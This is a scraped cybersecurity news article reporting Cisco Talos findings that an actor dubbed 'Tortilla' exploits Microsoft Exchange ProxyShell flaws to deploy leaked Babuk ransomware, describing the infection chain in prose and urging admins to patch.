Ukraine links members of Gamaredon hacker group to Russian FSB
Samsung Galaxy S21 hacked on second day of Pwn2Own Austin
Microsoft Exchange ProxyShell exploits used to deploy Babuk ransomware
US targets DarkSide ransomware, rebrands with $10 million reward
Windows 11 KB5008295 OOB update fixes certificate issue breaking apps
Pwn2Own: Printer plays AC/DC, Samsung Galaxy S21 hacked twice
FBI: Ransomware gangs hit several tribal-owned casinos in the last year
Philips healthcare infomatics solution vulnerable to SQL injection
Qualys BrowserCheck
Junkware Removal Tool
How to remove the PBlock+ adware browser extension
Remove the Search Redirect
Remove the Search Redirect
Remove the Search Redirect
Remove Security Tool and SecurityTool (Uninstall Guide)
How to remove Antivirus 2009 (Uninstall Instructions)
How to Remove WinFixer / Virtumonde / Msevents / Trojan.vundo
How to remove Google Redirects or the TDSS, TDL3, or Alureon rootkit using TDSSKiller
Locky Ransomware Information, Help Guide, and FAQ
CryptoLocker Ransomware Information Guide and FAQ
CryptorBit and HowDecrypt Information Guide and FAQ
CryptoDefense and How_Decrypt Ransomware Information Guide and FAQ
How to make the Start menu full screen in Windows 10
How to install the Microsoft Visual C++ 2015 Runtime
How to open an elevated PowerShell Admin prompt in Windows 10
How to Translate a Web Page in Google Chrome
How to start Windows in Safe Mode
How to remove a Trojan, Virus, Worm, or other Malware
How to show hidden files in Windows 7
How to see hidden files in Windows
IT Certification Courses
Gear + Gadgets
Microsoft Exchange ransomware attack
A new threat actor is hacking Microsoft Exchange servers and breaching corporate networks using the ProxyShell vulnerability to deploy the Babuk Ransomware.
The ProxyShell attacks against vulnerable Microsoft Exchange servers started several months ago, with LockFile and Conti being among the first ransomware groups to exploit them.
According to a report by researchers at Cisco Talos, a Babuk ransomware affiliate known as ‘Tortilla’ had joined the club in October, when the actor started using the ‘China Chopper’ web shell on breached Exchange servers.
The name Tortilla is based on malicious executables spotted in campaigns using the name Tortilla.exe.
The Babuk ransomware attack starts with a DLL, or .NET executable dropped on the Exchange server using the ProxyShell vulnerability.
The Exchange IIS worker process w3wp.exe then executes this malicious payload to execute obfuscated PowerShell command that features endpoint protection bypassing, eventually invoking a web request to fetch a payload loader named ‘tortilla.exe.’
This loader will connect to ‘’ and download a payload that is loaded into memory and injected into a NET Framework process, which ultimately encrypts the device with the Babuk Ransomware.
Although Cisco analysts found evidence of ProxyShell vulnerability exploitation in most infections, most notably the ‘China Chopper’ web shell, the telemetry data reflects a broad spectrum of attempted exploits.
More specifically, Tortilla followed these pathways to drop the DLL and .NET modules:
As these attacks rely on patched vulnerabilities, it is strongly advised that all admins upgrade their servers to the latest versions to prevent them from being exploited in attacks.
Babuk Locker is a ransomware operation launched at the beginning of 2021 when it began targeting businesses and encrypting their data in double-extortion attacks.
After conducting an attack on the Washinton DC’s Metropolitan Police Department (MPD), and feeling the heat from U.S. law enforcement, the ransomware gang shut down their operation.
After the source code for the first version of Babuk and a builder were leaked on hacking forums, other threat actors began utilizing the ransomware to launch their own attacks.
It is unclear if Tortilla was an affiliate of Babuk back when the RaaS was active or if they just grabbed the strain’s source code when it came out to conduct new attacks.
However, as the ransom note used in these attacks ask for a low $10,000 in Monero, it is likely not conducted by the original Babuk operation, who demanded far larger ransomware in Bitcoin.
Although Talos researchers noticed some attacks in Germany, Thailand, Brazil, and the U.K., most of Tortilla’s targets are U.S.-based.
The I.P. address of the download server is located in Moscow, Russia, which could indicate the origin of these attacks, but there are no attribution conclusions in the report.
Also, the ‘’ domain used for the unpacking stage has been previously abused by AgentTesla and FormBook distribution campaigns.
While a decryptor was previously released for Babuk ransomware, it can only decrypt victims whose private keys were part of the source code leak.
Therefore, threat actors can continue to use the Babuk ransomware strain to launch their own operations, such as what we are seeing with the Tortilla threat actor.
Conti ransomware now hacking Exchange servers with ProxyShell exploits
Over 30,000 GitLab servers still unpatched against critical bug
All Windows versions impacted by new LPE zero-day vulnerability
Emergency Google Chrome update fixes zero-days used in attacks
Babuk ransomware decryptor released to recover files for free
Not a member yet? Register Now
Popular ‘coa’ NPM library hijacked to steal user passwords
BlackMatter ransomware claims to be shutting down due to police pressure
To receive periodic updates and news from BleepingComputer, please use the form below.
Terms of Use Privacy PolicyEthics Statement
Copyright @ 2003 – 2021 Bleeping Computer® LLC – All Rights Reserved
Not a member yet? Register Now
Read our posting guidelinese to learn what content is prohibited.


You May Also Like

Nine WiFi routers used by millions were vulnerable to 226 flaws

Former Ubiquiti dev charged for trying to extort his employerNew malware hides…

Log4j attackers switch to injecting Monero miners via RMI

Microsoft December 2021 Patch Tuesday fixes 6 zero-days, 67 flawsNew ransomware now…

US, UK warn of Iranian hackers exploiting Microsoft Exchange, Fortinet

US indicts Iranian hackers for Proud Boys voter intimidation emailsWinamp prepares a…

New Memento ransomware switches to WinRar after failing at encryption

US regulators order banks to report cyberattacks within 36 hoursHackers deploy Linux…